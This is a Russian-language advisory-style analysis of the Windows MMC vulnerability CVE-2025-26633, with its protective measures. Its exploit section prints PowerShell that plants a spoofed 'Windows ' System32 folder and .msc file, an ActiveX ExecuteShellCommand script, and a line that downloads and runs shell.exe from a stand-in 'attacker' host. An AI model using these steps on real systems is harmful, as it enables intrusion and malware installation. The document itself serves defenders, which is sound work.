Уязвимость BDU:2025-02567 (CVE-2025-26633) консоли управления Windows

Уязвимость BDU:2025-02567 (CVE-2025-26633) в Microsoft Management Console (MMC) позволяет неавторизованному злоумышленнику локально обойти существующие ограничения безопасности. Эксплуатация связана с некорректной нейтрализацией входных данных. Данная уязвимость уже используется злоумышленниками для распространения вредоносного ПО.

Характеристики уязвимости

• Тип: Обход механизмов безопасности (Security Feature Bypass)

• CVSS 3.1: 7.0 (AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

• Вектор атаки: Локальный (требуется выполнение кода на целевой системе)

• Уязвимые версии:

  • Windows Server 2008–2025

  • Windows 10/11 (включая версии 1607, 1809, 21H2, 22H2, 23H2, 24H2)

• Ключевая причина: Ошибки валидации .msc-файлов и обработки ActiveX-объектов в MMC.

Технический анализ эксплоита

Эксплоит из общего доступа использует цепочку из трех этапов для обхода защиты и выполнения произвольного кода.

Этап 1: Подмена системных файлов

Скрипт PowerShell создает поддельные .msc-файлы в специально сформированных директориях:

New-Item "\\?\C:\Windows \System32\" # Директория с пробелом в имени  
[System.IO.File]::WriteAllBytes("C:\Windows \System32\WmiMgmt.msc", $maliciousPayload)  

Особенности:

• Использование префикса \\?\ для обхода нормализации путей NTFS.

• Подмена оригинального файла WmiMgmt.msc (инструмент управления WMI).

• Создание "двойника" системной папки **Windows ** (с пробелом в конце) для обхода контроля целостности.

Этап 2: Выполнение кода через ActiveX

Загруженный .msc-файл инициирует выполнение HTML-страницы с внедренным ActiveX-скриптом:

<script>  
external.ExecuteShellCommand("powershell.exe", "", "-Command Start-Process calc.exe");  
</script>  

Механизм атаки:

• ActiveX-объект MMC (Microsoft Management Console) позволяет выполнить произвольные команды.

• Обход AMSI (Antimalware Scan Interface) через скрытое окно PowerShell (-WindowStyle Hidden).

Этап 3: Установка бэкдора

Финализация атаки включает загрузку вредоносного ПО из C2-сервера:

Invoke-WebRequest -Uri "http://attacker/shell.exe" -OutFile $env:TEMP\c2.exe  
Start-Process -FilePath $env:TEMP\c2.exe  

Условия успешной эксплуатации

1. Локальный доступ:

   • Злоумышленник должен иметь возможность запустить .msc-файл на целевой системе (например, через фишинг).

2. Действия пользователя:

   • Открытие поддельного файла (например, WmiMgmt.msc).

   • Разрешение выполнения ActiveX-сценариев в MMC.

3. Сетевые требования:

   • Доступ к внутренней сети для загрузки payload (этап 2 и и этап 3).

4. Системные настройки:

   • Отсутствие мартовских обновлений 2025 года.

   • Отключенный Protected View для .msc-файлов.

Векторы атаки

• Фишинг: Рассылка поддельных .msc-файлов под видом "Консоли управления".

• Компрометация легитимных ресурсов: Внедрение вредоносных .msc-файлов на корпоративных порталах.

• Съемные носители: Автозапуск через поддельные ярлыки административных инструментов.

Методы защиты

Патчинг и конфигурация

1. Обновления:

   • Установка патчей Microsoft от 11.03.2025.

2. Групповые политики:

   • Блокировка выполнения недоверенных .msc-файлов:

     Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\MMC" -Name "RestrictToPermittedSnapins" -Value 1  

   • Отключение ActiveX в MMC через политики Internet Explorer.

3. WDAC (Windows Defender Application Control):

   • Разрешение выполнения только подписанных Microsoft .msc-файлов.

Мониторинг и реагирование

• Анализ процессов:

  • Детектирование аномальных цепочек: mmc.exe → powershell.exe → скрытые процессы.

• Аудит файловой системы:

  • Контроль изменений в %SystemRoot%\System32\*.msc.

• Сетевые правила:

  • Блокировка исходящих HTTP-запросов из системных процессов (кроме доверенных URL).